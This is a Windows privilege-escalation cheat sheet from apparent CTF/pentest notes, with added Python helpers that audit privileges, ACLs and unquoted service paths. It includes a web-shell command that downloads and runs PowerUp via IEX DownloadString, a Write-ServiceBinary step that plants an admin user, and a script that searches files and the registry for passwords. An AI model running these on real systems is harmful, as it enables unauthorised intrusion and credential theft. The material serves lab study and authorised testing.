2 Enums

Enumeration:

  1. Check your username and groups:

    1. whoami

    2. whoami /priv

    3. net user <your-username>

  2. winPEAS (fast, searchfast and cmd modes)

    1. Transfer Files

  3. Seatbelt and other scripts

  4. If the scripts fail, run the checks manually

  5. Other Windows PrivEsc cheatsheets:

    1. http://www.fuzzysecurity.com/tutorials/16.html --Windows Enums

systeminfo                ..OS build; note processor x64 vs OS x86; input for exploit suggesters
hostname
whoami /priv              ..for token impersonation (Potato exploits)
net users
net user Administrator
cmdkey /list              ..look for saved credentials

systeminfo

  • Find kernel exploits by feeding the systeminfo output to WES

  • Kernel exploits can crash the system

  • Find matching exploits: google, exploitdb, github

  • https://github.com/SecWiki/windows-kernel-exploits

cd C:\Windows\Temp
> systeminfo > sys.txt
> copy sys.txt \\10.x.x.x\share\

Hotfixes listed as N/A?
Confirm here:
dir C:\Windows\SoftwareDistribution\Download    ..prep from wsus
type C:\Windows\WindowsUpdate.log               ..actual update logs
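As an added example (not from the page, and not code from WES or windows-exploit-suggester), the Python below parses a systeminfo capture into the fields those tools key on and lists the follow-ups the notes above call for: an N/A hotfix list must be confirmed against SoftwareDistribution and WindowsUpdate.log, and an x86 OS changes which binaries you can run. The field names are those of real systeminfo output; the host names and KB numbers in the two samples are constructed.

```python
import re

# Constructed sample captures of `systeminfo` output (not taken from the page);
# only the fields the triage needs are included.
UNPATCHED_X86 = """\
Host Name:                 WS-EXAMPLE
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               x86-based PC
Hotfix(s):                 N/A
"""

PATCHED_X64 = """\
Host Name:                 SRV-EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB976902
"""

FIELD_RE = re.compile(r"^(?P<key>[A-Za-z() /]+?):\s+(?P<value>.*)$")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")
BUILD_RE = re.compile(r"Build (\d+)")


def parse_systeminfo(text):
    """Pull OS name, version, build number, architecture and hotfix list
    out of a systeminfo capture."""
    info = {"os_name": None, "os_version": None, "build": None,
            "arch": None, "hotfixes": []}
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb:                      # "[01]: KB..." continuation rows
            info["hotfixes"].append(kb.group(1))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            info["os_version"] = value
            b = BUILD_RE.search(value)
            info["build"] = int(b.group(1)) if b else None
        elif key == "System Type":
            info["arch"] = "x64" if value.lower().startswith("x64") else "x86"
    return info


def search_query(info):
    """Build the kind of search string the notes on this page use for a host."""
    return f'"{info["os_name"]} {info["os_version"]} privilege escalation"'


def triage(info):
    """Points to settle before trusting the capture or picking tooling."""
    notes = []
    if not info["hotfixes"]:
        notes.append("no hotfixes reported: confirm against "
                     "C:\\Windows\\SoftwareDistribution\\Download and WindowsUpdate.log")
    if info["arch"] == "x86":
        notes.append("32-bit OS: Watson and any exploit binaries must be built for x86")
    # Windows 7 / 2008 R2 are NT 6.1; SP1 is build 7601, so anything below is pre-SP1.
    if info["os_version"] and info["os_version"].startswith("6.1") \
            and info["build"] is not None and info["build"] < 7601:
        notes.append("pre-SP1 NT 6.1 build: host is missing years of updates")
    return notes


if __name__ == "__main__":
    for sample in (UNPATCHED_X86, PATCHED_X64):
        info = parse_systeminfo(sample)
        print(search_query(info))
        for note in triage(info):
            print("  -", note)
```

The hotfix rows are the part WES actually needs; if the capture shows N/A the tool will report every missing patch since RTM, which is why the confirmation step above matters.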

google

whoami
hostname
systeminfo   .. OS, Version, Hotfixes

google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation"
google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"

found: 
github/abatchy17/WindowsExploits > 
MS11-046.exe, MS10-059.exe     ..failed
Github/Re4son/chimichurri.exe  ..worked (arctic-htb)
and
MS11-046 (AFD PrivEsc)         ..develHTB

Tasklist

tasklist /V

Windows Exploit Suggester

  • Lots of findings; you just have to look through them.

  • MS10-059 = chimichurri

windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt

WES

curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python3 wes.py --update 
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

WESng

  • Based on Windows version and patch level

  • https://github.com/bitsadmin/wesng

> curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
> python3 wes.py --update 
> python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
> python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only  

Kernel Exploits

  • Compare to 'systeminfo' report

  • https://github.com/SecWiki/windows-kernel-exploits

  • https://github.com/rasta-mouse/Watson ..for recent windows

  • USE: WinKernelExploits

Check Perms

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 
accesschk.exe /accepteula -quv user CleanUp.ps1

User whoami privs

Privileges give your token special rights

whoami /priv

Note: if a privilege is listed, you have it, even when its state says 'Disabled'.

  • SeImpersonatePrivilege: allows impersonating client tokens. Ex: Juicy Potato

  • SeAssignPrimaryTokenPrivilege: similar; lets the user assign an access token to a new process. Ex: Juicy Potato

  • SeBackupPrivilege: grants read access to ALL objects; could expose sensitive files/hashes/registry hives

  • SeRestorePrivilege: grants write access to all objects; overwrite binaries/DLLs/registry

  • SeTakeOwnershipPrivilege: can take ownership and then write; overwrite binaries/DLLs/registry

  • Advanced: SeTcbPrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeDebugPrivilege (used in getsystem)
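Added example, not from the page: a small parser for whoami /priv output that flags the privileges listed above whether the State column says Enabled or Disabled, which is the point the note makes. The sample output is constructed; the risk descriptions are my own summaries of the bullets above.

```python
# Constructed sample of `whoami /priv` output (not taken from the page).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# The privileges the notes above single out, and why each one matters.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate client tokens (Potato family)",
    "SeAssignPrimaryTokenPrivilege": "assign a token to a new process (Potato family)",
    "SeBackupPrivilege": "read any object: files, hashes, registry hives",
    "SeRestorePrivilege": "write any object: binaries, DLLs, registry",
    "SeTakeOwnershipPrivilege": "take ownership, then write",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeDebugPrivilege": "open any process (used by getsystem)",
}

# Holding either of these is what the Potato-style token attacks need.
IMPERSONATION = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_priv(text):
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Privilege rows start with an Se* constant and end with the State column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def flag_privileges(privs):
    """High-risk privileges held by the token, regardless of state: a
    'Disabled' privilege is still held, it just has not been enabled yet."""
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


def has_impersonation(privs):
    """True if the account should be treated as SYSTEM-equivalent for risk
    purposes (typical of service accounts such as IIS application pools)."""
    return bool(IMPERSONATION & privs.keys())


if __name__ == "__main__":
    privs = parse_whoami_priv(WHOAMI_PRIV)
    for name, state, why in flag_privileges(privs):
        print(f"{name:32} {state:9} {why}")
    print("impersonation-capable:", has_impersonation(privs))
```

On the sample, SeImpersonatePrivilege is reported as Disabled and is still flagged; the same check run over the tokens of your service accounts tells you which of them are worth hardening first.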

Windows Service Configuration Viewer

  • Check for misconfigurations in services that can lead to privilege escalation.

  • If the service binary is writable by a low-privileged user, it can be replaced with your own,

  • and Windows will execute whatever code it contains as the privileged service account.

icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
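Added example, not from the page: a parser for icacls output that flags ACEs granting low-privileged principals write-capable rights on a service binary, which is exactly what makes the listing above a finding (Everyone has F). The capture is constructed to match that listing; the set of "low-privileged" principals and of write-capable rights are my assumptions, and icacls prints the queried path on the first line ahead of the first ACE, so the parser strips it.

```python
import re

# Constructed icacls capture for a service binary (not from the page).
ICACLS_OUTPUT = (
    "scsiaccess.exe NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "               BUILTIN\\Administrators:(I)(F)\n"
    "               BUILTIN\\Users:(I)(RX)\n"
    "               APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n"
    "               Everyone:(I)(F)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# principal:(flags)(rights) ... one ACE per line
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<perms>(?:\([^)]*\))+)$")

# Rights that let a principal change the file, its ACL, or its owner
# (F full, M modify, W write, WD write data, AD append, WA write attrs,
#  D delete, WDAC write DAC, WO write owner). Assumed set.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "D", "WDAC", "WO"}

# Principals that every local user (or everyone) falls under. Assumed set.
LOW_PRIV = {"everyone", "builtin\\users", "users",
            "nt authority\\authenticated users", "authenticated users",
            "nt authority\\interactive"}


def parse_icacls(text, path):
    """Return [(principal, set_of_rights)] for each ACE in an icacls listing."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(path):            # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("perms")):
            rights.update(r.strip() for r in group.split(","))
        aces.append((m.group("who"), rights))
    return aces


def weak_aces(aces):
    """ACEs where a low-privileged principal can modify the binary."""
    return [(who, sorted(rights & WRITE_RIGHTS))
            for who, rights in aces
            if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS]


if __name__ == "__main__":
    aces = parse_icacls(ICACLS_OUTPUT, "scsiaccess.exe")
    for who, rights in weak_aces(aces):
        print(f"WEAK: {who} has {','.join(rights)}")
```

The fix for a hit is to remove the offending ACE (or reset the binary's ACL to inherit from a properly secured Program Files directory); BUILTIN\Users with RX, as in the listing, is the expected state.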

Watson

  • .NET tool that finds missing patches

  • https://github.com/rasta-mouse/Watson

  • Check the target's .NET version and build Watson for that version in Visual Studio

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build for that version, and for x86 if the OS is x86

\\10.10.14.34\share\Watson.exe
Watson found 5 vulns
Including: MS11-046

Sherlock

  • Example from DrupalPhpVuln

locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1  ..fixed some bad unicode at the beginning of the file
vim Sherlock.ps1
Find-AllVulns          ..add as the last line

http://10.x.x.x/ippsec.php?fexec=
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -

Found:
MS15-051 ClientCopyImage reported not-vulnerable (but ippsec disagrees, so try it)
MS16-016 WebDAV ..requires 2 processors and a race condition ..ignore

UACME

  • Tries 30+ ways to PrivEsc

  • "You AC Me Bro"

  • https://github.com/hfiref0x/UACME

UAC Bypass

  • User Account Control

  • Metasploit has 'bypassuac' for Windows 7

  • PowerShell Empire has one that prompts in a nice way

BeRoot

  • Checks for misconfigurations on Windows or Linux

  • C:\Tools\beRoot.exe

  • Found lots of vulns for PrivEsc

PowerUp Scan

  • Powershell script to find PrivEsc Vulns and Exploit

  • PowerShell > PowerShellEmpire > PowerUp.ps1

  • https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

locate PowerUp.ps1  (empire)
cp PowerUp.ps1 .
vim PowerUp.ps1     ..add 'Invoke-AllChecks' as the last line
python -m SimpleHTTPServer

Send to the victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

Found a few writable directories for Oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an     ..3306 mysql, but not oracle (1521)

PowerUp Abuse

  • Abuse functions:

    • Write-UserAddMSI

    • Write-ServiceBinary ..creates user 'john' with password123 as admin!

locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer        ..share it

Send the file to the victim        ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IEX(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

PS> Import-Module .\PowerUp.ps1   ..run as admin if you can
PS> Invoke-AllChecks              ..scan

----------------------------------
Found: unquoted service path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe

Exploit:
Creates a new local admin user 'john' with password 'Password 123!'
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath "C:\Program Files\VideoStream\1337.exe"
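The unquoted-path finding above comes from how Windows resolves an ImagePath that contains spaces and no quotes: it tries each prefix ending at a space with ".exe" appended before the full path, which is why the dropped binary is named 1337.exe. As an added example (not from the page and not PowerUp's code), the audit below reproduces that check over constructed service entries, lists the candidate paths whose directories need their ACLs reviewed, and returns the remediated, quoted ImagePath. Only the 'Video Stream' path is taken from the page; the other services, accounts and the assumption that the first ".exe" ends the executable are mine.

```python
# Constructed service registry entries (not from the page): name, ImagePath, account.
SERVICES = [
    ("Video Stream", r"C:\Program Files\VideoStream\1337 Log\Checklog.exe", "LocalSystem"),
    ("Spooler", r'"C:\Windows\System32\spoolsv.exe"', "LocalSystem"),
    ("ExampleSvc", r"C:\Windows\System32\svchost.exe -k netsvcs", "LocalSystem"),
    ("Quoted Svc", r'"C:\Program Files\Vendor App\agent.exe" --service', "NT AUTHORITY\\LocalService"),
]


def executable_part(image_path):
    """Executable portion of an ImagePath, dropping any arguments.
    Assumes the first '.exe' ends the executable name."""
    idx = image_path.lower().find(".exe")
    return image_path if idx == -1 else image_path[: idx + 4]


def is_unquoted_with_spaces(image_path):
    """The misconfiguration: no leading quote and a space inside the exe path."""
    s = image_path.strip()
    return not s.startswith('"') and " " in executable_part(s)


def search_candidates(image_path):
    """Paths Windows would try, in order, when starting an unquoted service."""
    exe = executable_part(image_path.strip())
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def quoted(image_path):
    """Remediated form: quote the executable and keep its arguments."""
    s = image_path.strip()
    exe = executable_part(s)
    return f'"{exe}"{s[len(exe):]}'


def audit(services):
    """Findings for every service whose ImagePath is unquoted and has spaces."""
    findings = []
    for name, image_path, account in services:
        if is_unquoted_with_spaces(image_path):
            findings.append({
                "service": name,
                "account": account,
                "candidates": search_candidates(image_path),
                "fix": quoted(image_path),
            })
    return findings


if __name__ == "__main__":
    for f in audit(SERVICES):
        print(f"{f['service']} (runs as {f['account']})")
        for c in f["candidates"]:
            print("  would try:", c)
        print("  fix ImagePath to:", f["fix"])
```

On the sample only 'Video Stream' is reported: the svchost entry has arguments but no space inside the executable path, and the two quoted entries are already correct. The fix is the one-line ImagePath change the audit prints; locking down write access to C:\ and C:\Program Files\VideoStream\ is the defence in depth.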

SharpUp

SharpUp: good if you don't have PowerShell. C# compiled version: https://github.com/GhostPack/SharpUp and https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

win ps or cmd: 
> SharpUp.exe

Seatbelt

Enumeration, but it doesn't hunt for privesc

GhostPack/Seatbelt: https://github.com/GhostPack/Seatbelt; compiled binaries: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/ (Seatbelt.exe)

Seatbelt.exe                    ..help
Seatbelt.exe all
Seatbelt.exe NonstandardServices

winPEAS

Hunts for privesc and highlights findings. The most powerful tool in this course, and the most maintained.

carlospolop winPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Enable cmd colors: reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

If you can't get colors, try running it from Kali over a reverse shell

cd C:\PrivEsc
winPEASany.exe -h
winPEASany.exe                   ..default: all checks
winPEASany.exe userinfo
winPEASany.exe quiet procesinfo  ..(yes, misspelled in the tool)

accesschk

Older but trustworthy tool to check ACLs: what access a user/group has to a file, directory, service or registry key. Downside: sometimes a GUI EULA popup (older versions don't have it).

Quick-Paste-Report

  • Copy/Paste into your remote Windows shell to generate a quick report:

@echo --------- BASIC WINDOWS RECON --------- > report.txt
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -a >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\" >> report.txt
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\" >> report.txt
timeout 1
dir "C:\Users\" >> report.txt
timeout 1
dir "C:\Users\Public\" >> report.txt
timeout 1
echo REPORT COMPLETE!

Problems

Enums failing?
Couldn't get Watson or winPEAS.exe to work

.NET might be old

Example: 'Granny' had .NET v1.0


> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"


Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437

---------------------------------
---------------------------------
Use the .bat instead!

C:\Temp>winPEAS.bat
winPEAS.bat

Nothing happened?
Prefixing it with cmd /k worked.
If you check cmd /?, the /k switch carries out the command specified by the string but remains.
I suspect cmd /c would work as well, but I never tried that.


C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
cmd /k winPEAS.bat > output.txt

Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...

Last updated 2 years ago

Was this helpful?